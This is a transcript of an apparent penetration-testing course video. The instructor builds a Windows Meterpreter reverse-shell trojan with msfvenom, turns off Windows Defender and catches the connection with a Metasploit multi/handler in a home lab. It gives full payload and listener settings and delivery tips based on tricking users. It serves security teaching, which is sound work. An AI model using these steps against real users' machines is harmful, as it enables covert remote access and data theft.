[00:00:00] Instructor: Okay, it is time we see how we can gain access to the secured systems. In the previous few videos we talked about and we attacked machines that had some vulnerability inside of them, whether it was the operating system vulnerability, an outdated software, or weak credentials. We managed to exploit them through those vulnerabilities and gain access to them. But now let's see what happens if our target doesn't have any known vulnerability. What now?

[00:00:31] Well, remember I told you that the process of attacking is rather the same. In this case, we want to deliver the payload to the target and execute it. Just while the target had a vulnerability, we did this through an exploit, and through that vulnerability we managed to execute the payload ourselves. Now it becomes harder. We must deliver the payload to the target using some other method and the target has to execute the payload themselves. That is the hard part. The way you deliver the payload is completely up to you, whether it is over an email, or over some HTTP page, over a USB drive, it doesn't matter. What matters is that the payload ends up on their machine and they double click and run it.

[00:01:21] For now, let us focus on just creating the payload and running it to see if it works. For this, I will use a Kali Linux machine to create the payload and I will execute it on my main Windows 10 machine. You can run our payloads on the Windows 10 machine that we installed in the previous section or you can use any other Windows machine whatsoever. It doesn't even have to be a Windows 10, it is completely up to you. Just one thing that we must make sure is that Windows Defender and antivirus software are turned off.

[00:01:54] Why? Well, we are going to be creating a payload using the MSFvenom tool from the Metasploit framework. And since many people use the exact same tool to create the exact same payloads as we will right now, those payloads are well known to every antivirus software and they will get detected quickly. However, for now our goal is not to bypass antiviruses but to just create a payload and get it to work. So turn off your Windows Defender and I will do it right here as well. You can go to this arrow, click on the Windows Defender. And the one thing that we want to turn off is under this virus and threat protection. We want to go to the manage settings and turn off the real-time protection. It'll ask you for the administrator password and once you type it in, it'll turn off the real-time protection, as it says right here.

[00:02:47] So I will close this and now let's create our very first Trojan. As I already said, for this we'll be using a tool called MSFvenom. So I will open a terminal right here. Why are we using MSFvenom? Well, it is a known tool and it is used to generate payloads really fast. In just one command, we will be able to generate a program that will gain us access to the target system. So let us see how we can create a simple one first. If I type the command msfvenom -h, right here we are going to see our available options with MSFvenom. And up here we also get examples of usage, which tell us how we can generate a simple payload right here. Let's follow the example and try it out.

[00:03:40] Now it tells us right here that to run MSFvenom, we need to specify the entire path right here. But instead we can just specify msfvenom. It'll still recognize it as the tool that we need and we can write our options right after it. So let me clear the screen so we can see the command better. And if I go and type msfvenom, we want to use the -p option, and this -p option stands for payload. So here we specify which type of payload we are creating. In my case, since I'm going to be attacking this Windows 10 64-bit machine, I want to generate a windows/x64/meterpreter/reverse_tcp payload. I'm using 64-bit because my machine is a 64-bit machine, and I'm using a reverse shell connection.

[00:04:37] Another option that we must specify is the LHOST, and LHOST is the IP address of your Kali Linux machine. So 192.168.1.12 in my case. I will just double check it. So sudo ifconfig, test1234 is my password. And here it is, the IP address is correct. Great. Another option we must specify is the local port. And by the way, this LHOST stands for local host, not sure if I mentioned it. And the local port is the port that the target will connect to. In our case, we can set that to be any port that we want. For example, let's use 5555.

[00:05:18] After that we can use the -f option to specify the file type that we want to create. So since we are attacking a Windows machine in this video, I'm going to be creating an exe file. So I will just type -f and then exe. And the last option that I want to specify is -o. And this -o stands for output. Here we specify the name of the file. I will just call it shell.exe. This is all we will specify for now. So once again, we are creating a 64-bit payload for the Windows target. We set the local host, which will be written inside the payload so the target can connect to our Kali Linux machine, and we also specify the local port to which the target will connect. After that, we mentioned that the file type will be .exe, which is an executable for Windows, and at the end we output all of this with the name shell.exe. Let's press enter, and here it is.

[00:06:20] Our payload is right here on our Kali Linux desktop. Here we can see it, shell.exe. This program, once executed on the target machine, will grant us access and give us the meterpreter shell on that machine. Let's move it real quick to the target machine. And this is something that you can do however you want. You can plug in the USB device by going in Kali Linux, then on Devices, then USB, and select the USB device right here. Then you will transfer it to the USB device. And from the USB device you will transfer it to your target Windows machine. Or you can also go to Devices, click on Drag and Drop and set it to be bidirectional. This simply means that you can just copy the file from the Kali Linux desktop and paste it, or just drag it to the Windows 10 desktop, in my case. In case you're using another virtual machine that you're attacking, you can just copy it first to your main machine desktop and then from the main machine desktop copy it to the desktop of your virtual machine. Just make sure that in the target virtual machine you also set the drag and drop to be bidirectional.

[00:07:32] Great, now we got our shell.exe, or our payload, on the target machine. Great, but we are not done yet. Remember that this shell will attempt to connect to our Kali Linux machine once executed, since it is a reverse shell. And it'll connect on the port 5555. In order for the connection to be established, we must be listening on that port and have it open in order for the target to even be able to connect back to us. This is something the Metasploit framework manually configured for us once we performed our exploitation of our vulnerability. But right now we must do it manually. And we can do it with the help of msfconsole as well. So what I'm going to do is I'm going to start msfconsole, and once it opens up I want to type use exploit/multi/handler. And this is not an actual exploit. You can imagine this as something that will listen for the incoming connection from our payload. It is also called a listener. So let's set it up.

[00:08:39] If I clear the screen to see it better and type show options, there is only one thing that we need to set and that is the payload. So the payload in this bracket must match the payload that the target will execute. So let's change it: set payload to windows/x64/meterpreter/reverse_tcp. Show options once again, and we must set the LHOST and LPORT to match the ones from the MSFvenom command. So set LHOST to be the IP address of my Kali Linux machine, which is .1.12, and set the LPORT to be 5555. Once we set up all of these settings, we can run it. So I'll just type run. We can see it is now listening for the connections and nothing else is really happening right here. Why? Well, because the shell on the target system hasn't been run yet. So let's run it on the Windows machine. Double click and you will see nothing is opening. But if I go back to my Kali Linux machine, here it is. Here is our meterpreter session opened, and it is identical to the ones that we had during our vulnerability exploitation section.

[00:09:57] Just this time we created and delivered it manually, and we also manually set up our listener. Keep in mind that this didn't exploit any vulnerability; we are just relying on the mistake from the other person that is using the target machine to execute our file. Otherwise, if the file doesn't get executed, we don't get access to their machine. And another thing to keep in mind is that the listener, or in our case this multi handler that we have, must be run before the payload or before this shell.exe, which is kind of logical since if the target runs our file and we weren't listening for the connection, then they won't be able to connect to our machine. You can also notice on the target's desktop once again nothing is really happening. So they might think that the program they executed didn't work and they won't question it that much. But of course we got the connection right here and we can use all of the commands that meterpreter gives us. We can as usual enter a shell, type whoami, type ipconfig, and all the other commands that we can execute. Type dir to check out all of the available files on the desktop.

[00:11:12] And if I exit this, exit out of the meterpreter shell, since we successfully gained access to it once again. But keep in mind that of course this was just a basic example, and we will see in the next few videos how to create a little bit more complex payloads. See you in the next video.